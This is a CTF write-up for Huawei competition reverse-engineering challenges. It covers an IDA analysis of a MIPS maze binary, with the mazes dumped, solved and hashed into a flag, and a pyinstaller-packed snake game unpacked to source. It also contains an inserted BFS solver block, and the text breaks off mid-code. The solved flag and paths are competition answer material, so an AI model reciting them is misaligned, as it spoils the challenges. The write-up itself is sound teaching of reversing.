<content type="html"><![CDATA[<p>Three Huawei competitions</p><a id="more"></a><h1 id="12-23-鲲鹏计算专场"><a href="#12-23-鲲鹏计算专场" class="headerlink" title="[12.23] 鲲鹏计算专场"></a>[12.23] Kunpeng Computing Track</h1><h2 id="mips"><a href="#mips" class="headerlink" title="mips"></a>mips</h2><p>MIPS architecture.</p><p>After decompiling in IDA we can see:</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/07/48HWvRVPKY2DSrt.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>v4 is the string we input. This is clearly maze logic: we move up, down, left and right with wasd, and the maze is stored in dword_100111F0.</p><p>The initialization function sub_10000744() locates the starting point (the cell holding 3 in the maze; later we see that 3 actually marks the current position).</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/07/c9DZrzjpOKIhWJT.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>Here we can also see that there should be several mazes (dword_10011D10 holds the maze index, which is <=2, and one maze holds 225 numbers) together with a maze width of 15, i.e. three mazes of 15*15 each.</p><p>Then come the four functions below; picking any one of them (for example sub_10000D28()) we see:</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="C:\Users\大仑子\AppData\Roaming\Typora\typora-user-images\image-20210107193752532.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>It is clearly a move-right function: 3 marks the current position, and the previous current position is set back to 1 (a walkable path). We can also see that the goal is 4, so we have to walk each maze from 3 to 4.</p><p>Dump the maze array and write a script to print the maze:</p><div class="highlight-wrap" autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true" data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line">aMap=[<span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span 
class="number">0</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">3</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span 
class="number">1</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">0</span>, <span 
class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">4</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span 
class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">3</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span 
class="number">1</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">1</span>, <span 
class="number">1</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span 
class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">4</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span 
class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">3</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span 
class="number">1</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span 
class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span 
class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">4</span>, <span class="number">0</span>, <span class="number">0</span>]</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">45</span>):</span><br><span class="line"> <span class="keyword">for</span> j <span class="keyword">in</span> range(<span class="number">15</span>):</span><br><span class="line"> <span class="keyword">if</span> aMap[i*<span class="number">15</span>+j]==<span class="number">0</span>:</span><br><span class="line"> tmp=<span class="string">'*'</span></span><br><span class="line"> <span class="keyword">elif</span> aMap[i*<span class="number">15</span>+j]==<span class="number">1</span>:</span><br><span class="line"> tmp=<span class="string">'.'</span></span><br><span class="line"> <span class="keyword">elif</span> aMap[i*<span class="number">15</span>+j]==<span class="number">3</span>:</span><br><span class="line"> tmp=<span class="string">'@'</span></span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> tmp=<span class="string">'#'</span></span><br><span class="line"> print(tmp,end=<span class="string">''</span>)</span><br><span class="line"> print()</span><br><span class="line"> <span class="keyword">if</span> i==<span class="number">14</span> <span class="keyword">or</span> i==<span class="number">29</span>:</span><br><span class="line"> 
print()</span><br></pre></td></tr></table></figure></div><p>Three mazes are printed; a few distinctive characters were chosen so they are easy to read.</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line">.....**********</span><br><span class="line">.....*@*.******</span><br><span class="line">.....*.*.******</span><br><span class="line">.....*.*.******</span><br><span class="line">.....*.*.....**</span><br><span class="line">.....*.*****.**</span><br><span class="line">.....*.*****.**</span><br><span class="line">.....*.*****..*</span><br><span class="line">.....*........*</span><br><span class="line">.....********<span class="comment">#*</span></span><br><span class="line">...............</span><br><span class="line">...............</span><br><span class="line">...............</span><br><span class="line">...............</span><br><span class="line">...............</span><br><span class="line"><span class="comment">#sssssssddddddds</span></span><br><span class="line"></span><br><span class="line">..*************</span><br><span class="line">..*@*....******</span><br><span class="line">..*.****.******</span><br><span class="line">..*.****.******</span><br><span class="line">..*..***.....**</span><br><span class="line">..*..*******.**</span><br><span class="line">..*..*******.**</span><br><span class="line">..*..*****....*</span><br><span class="line">..*..*****.**.*</span><br><span class="line">..*..*****.****</span><br><span class="line">..*......*.*..*</span><br><span class="line">..*...........*</span><br><span class="line">..***********<span class="comment">#*</span></span><br><span class="line">...............</span><br><span class="line">...............</span><br><span class="line"><span class="comment">#ssssssssssdddddddddds</span></span><br><span class="line"></span><br><span class="line">***************</span><br><span 
class="line">*@..***********</span><br><span class="line">***.*...*******</span><br><span class="line">***...*.*******</span><br><span class="line">****.**.*******</span><br><span class="line">*..*.**.*******</span><br><span class="line">**...**.*******</span><br><span class="line">*******.*******</span><br><span class="line">*******....****</span><br><span class="line">**********.****</span><br><span class="line">**********.****</span><br><span class="line">**********.****</span><br><span class="line">**********....*</span><br><span class="line">*************.*</span><br><span class="line">*************<span class="comment">#*</span></span><br><span class="line"><span class="comment">#ddssddwddssssssdddssssdddss</span></span><br></pre></td></tr></table></figure></div><p>Walk the mazes, concatenate the paths, convert to MD5 as the hint says, and get the flag.</p><p>(One doubt though: in theory the second maze has multiple solutions even among the shortest paths? Is the challenge broken, or did I miss something = =</p><p>(One more thing: the challenge apparently didn't even require the shortest path??? Amazing.jpg</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/11/GUHrwkIqbS7dFmM.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">import</span> hashlib</span><br><span class="line">s=<span class="string">b"sssssssdddddddsssssssssssddddddddddsddssddwddssssssdddssssdddss"</span></span><br><span class="line">print(<span class="string">"flag{%s}"</span>%hashlib.md5(s).hexdigest())</span><br></pre></td></tr></table></figure></div><p><strong>flag{999ea6aa6c365ab43eec2a0f0e5968d5}</strong></p><h2 id="pypy"><a href="#pypy" class="headerlink" title="pypy"></a>pypy</h2><p>Drag the challenge file into IDA and search the strings; we can see:</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/11/pxy1fbNYldmPA4M.png" alt="" title="">
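<p>Added example for the maze walk in the mips section above (this is not the writeup's own script): it BFSes each of the three 15x15 mazes exactly as the writeup's script printed them, using the page's rules (3 = current position, 1 = walkable, 4 = goal, wasd moves), and also counts the shortest walks, which settles the doubt about the second maze: mazes 1 and 3 have exactly one shortest walk, maze 2 has 36. The acceptance rule in <code>walk</code> (the run must end on 4) is an assumption, since the binary's end check is not shown.</p>

```python
from collections import deque

N = 15  # every maze is 15x15, as the writeup infers from the 225-entry stride
# The three mazes exactly as the writeup's script printed them (copied from the page):
# '@' = 3 (current position), '.' = 1 (walkable), '*' = 0 (wall), '#' = 4 (goal).
MAZES_TEXT = """\
.....**********
.....*@*.******
.....*.*.******
.....*.*.******
.....*.*.....**
.....*.*****.**
.....*.*****.**
.....*.*****..*
.....*........*
.....********#*
...............
...............
...............
...............
...............
..*************
..*@*....******
..*.****.******
..*.****.******
..*..***.....**
..*..*******.**
..*..*******.**
..*..*****....*
..*..*****.**.*
..*..*****.****
..*......*.*..*
..*...........*
..***********#*
...............
...............
***************
*@..***********
***.*...*******
***...*.*******
****.**.*******
*..*.**.*******
**...**.*******
*******.*******
*******....****
**********.****
**********.****
**********.****
**********....*
*************.*
*************#*
"""
MOVES = (("s", 1, 0), ("d", 0, 1), ("w", -1, 0), ("a", 0, -1))  # the binary's wasd keys


def load_mazes(text=MAZES_TEXT):
    """Split the 45 printed rows into three 15-row grids."""
    rows = text.splitlines()
    return [rows[i:i + N] for i in range(0, len(rows), N)]


def locate(grid, ch):
    return next((r, c) for r, row in enumerate(grid) for c, x in enumerate(row) if x == ch)


def solve_maze(grid):
    """BFS '@' -> '#': returns (wasd string of one shortest walk, number of shortest walks)."""
    start, goal = locate(grid, "@"), locate(grid, "#")
    dist, ways, parent = {start: 0}, {start: 1}, {start: None}
    queue = deque([start])
    while queue:
        cur = queue.popleft()
        for key, dr, dc in MOVES:
            nxt = (cur[0] + dr, cur[1] + dc)
            if not (0 <= nxt[0] < N and 0 <= nxt[1] < N) or grid[nxt[0]][nxt[1]] == "*":
                continue
            if nxt not in dist:  # first visit: remember which key got us here
                dist[nxt], ways[nxt], parent[nxt] = dist[cur] + 1, ways[cur], (cur, key)
                queue.append(nxt)
            elif dist[nxt] == dist[cur] + 1:  # another equally short route into nxt
                ways[nxt] += ways[cur]
    keys, cur = [], goal  # KeyError here means the goal is unreachable
    while parent[cur] is not None:
        cur, key = parent[cur]
        keys.append(key)
    return "".join(reversed(keys)), ways[goal]


def walk(grid, path):
    """Replay a wasd string: each step must land on a non-wall cell and the walk must end on '#'
    (assumed acceptance rule; the binary's exact end check is not shown in the writeup)."""
    step = {key: (dr, dc) for key, dr, dc in MOVES}
    r, c = locate(grid, "@")
    for key in path:
        r, c = r + step[key][0], c + step[key][1]
        if not (0 <= r < N and 0 <= c < N) or grid[r][c] == "*":
            return False
    return grid[r][c] == "#"
```

Joining the three returned walks and hashing them with MD5, as the writeup's last snippet does, yields the flag; only maze 2 can differ from the writeup's string, since any of its 36 shortest walks is accepted.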
 </div> <div class="image-caption"></div> </figure><p>Presumably this is a file packed by pyinstaller.</p><blockquote><p>It was this challenge that made me realize pyinstaller can also pack into an ELF, so right after the competition I updated the unpacking guide I had written earlier: <a href="https://c10udlnk.top/2020/12/04/reSkillsOn-Pyinstaller-extracted-to-python/" target="_blank" rel="noopener">RE Tricks - Restoring pyinstaller-packed Files | c10udlnk_Log</a>.</p></blockquote><p>Follow the procedure to unpack it and obtain the Python source.</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/11/WFGf3lxitCeHn4L.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>Seeing obfuscated variable names like these, I immediately replaced them with IDA-style variable names (.</p><p>Here is the source:</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="C"><figure class="iseeu highlight /c"><table><tr><td class="code"><pre><span class="line"># uncompyle6 version <span class="number">3.7</span><span class="number">.4</span></span><br><span class="line"># Python bytecode <span class="number">3.8</span> (<span class="number">3413</span>)</span><br><span class="line"># Decompiled from: Python <span class="number">2.7</span><span class="number">.18</span> (v2<span class="number">.7</span><span class="number">.18</span>:<span class="number">8</span>d21aa21f2, Apr <span class="number">20</span> <span class="number">2020</span>, <span class="number">13</span>:<span class="number">25</span>:<span class="number">05</span>) [MSC v<span class="number">.1500</span> <span class="number">64</span> <span class="built_in">bit</span> (AMD64)]</span><br><span class="line"># Warning: <span class="keyword">this</span> version of Python has problems handling the Python <span class="number">3</span> <span class="string">"byte"</span> type in constants properly.</span><br><span class="line"></span><br><span class="line"># Embedded file name: main.py</span><br><span class="line"># Compiled at: <span class="number">1995</span><span class="number">-09</span><span class="number">-28</span> <span 
class="number">00</span>:<span class="number">18</span>:<span class="number">56</span></span><br><span class="line"># Size of source mod <span class="number">2</span>**<span class="number">32</span>: <span class="number">257</span> bytes</span><br><span class="line"><span class="keyword">import</span> <span class="built_in">random</span>, codecs, sys, time, pygame</span><br><span class="line">from pygame.locals <span class="keyword">import</span> *</span><br><span class="line">from collections <span class="keyword">import</span> <span class="built_in">deque</span></span><br><span class="line">SCREEN_WIDTH = <span class="number">600</span></span><br><span class="line">SCREEN_HEIGHT = <span class="number">480</span></span><br><span class="line">SIZE = <span class="number">20</span></span><br><span class="line">LINE_WIDTH = <span class="number">1</span></span><br><span class="line">flag = 'flag{this is a fake flag}'</span><br><span class="line">SCOPE_X = (<span class="number">0</span>, SCREEN_WIDTH <span class="comment">// SIZE - 1)</span></span><br><span class="line">SCOPE_Y = (<span class="number">2</span>, SCREEN_HEIGHT <span class="comment">// SIZE - 1)</span></span><br><span class="line">FOOD_STYLE_LIST = [(<span class="number">10</span>, (<span class="number">255</span>, <span class="number">100</span>, <span class="number">100</span>)), (<span class="number">20</span>, (<span class="number">100</span>, <span class="number">255</span>, <span class="number">100</span>)), (<span class="number">30</span>, (<span class="number">100</span>, <span class="number">100</span>, <span class="number">255</span>))]</span><br><span class="line">LIGHT = (<span class="number">100</span>, <span class="number">100</span>, <span class="number">100</span>)</span><br><span class="line">DARK = (<span class="number">200</span>, <span class="number">200</span>, <span class="number">200</span>)</span><br><span class="line">BLACK = (<span class="number">0</span>, <span 
class="number">0</span>, <span class="number">0</span>)</span><br><span class="line">RED = (<span class="number">200</span>, <span class="number">30</span>, <span class="number">30</span>)</span><br><span class="line">BGCOLOR = (<span class="number">40</span>, <span class="number">40</span>, <span class="number">60</span>)</span><br><span class="line"></span><br><span class="line">def print_text(v1, v2, v3, v4, v5, fcolor=(<span class="number">255</span>, <span class="number">255</span>, <span class="number">255</span>)):</span><br><span class="line"> v6 = v2.render(v5, True, fcolor)</span><br><span class="line"> v1.blit(v6, (v3, v4))</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">def init_snake():</span><br><span class="line"> v7 = <span class="built_in">deque</span>()</span><br><span class="line"> v7.append((<span class="number">2</span>, SCOPE_Y[<span class="number">0</span>]))</span><br><span class="line"> v7.append((<span class="number">1</span>, SCOPE_Y[<span class="number">0</span>]))</span><br><span class="line"> v7.append((<span class="number">0</span>, SCOPE_Y[<span class="number">0</span>]))</span><br><span class="line"> <span class="keyword">return</span> v7</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">def create_food(v8):</span><br><span class="line"> v9 = <span class="built_in">random</span>.randint(SCOPE_X[<span class="number">0</span>], SCOPE_X[<span class="number">1</span>])</span><br><span class="line"> v10 = <span class="built_in">random</span>.randint(SCOPE_Y[<span class="number">0</span>], SCOPE_Y[<span class="number">1</span>])</span><br><span class="line"> <span class="keyword">while</span> (v9, v10) in v8:</span><br><span class="line"> v9 = <span class="built_in">random</span>.randint(SCOPE_X[<span class="number">0</span>], SCOPE_X[<span class="number">1</span>])</span><br><span class="line"> v10 = <span class="built_in">random</span>.randint(SCOPE_Y[<span 
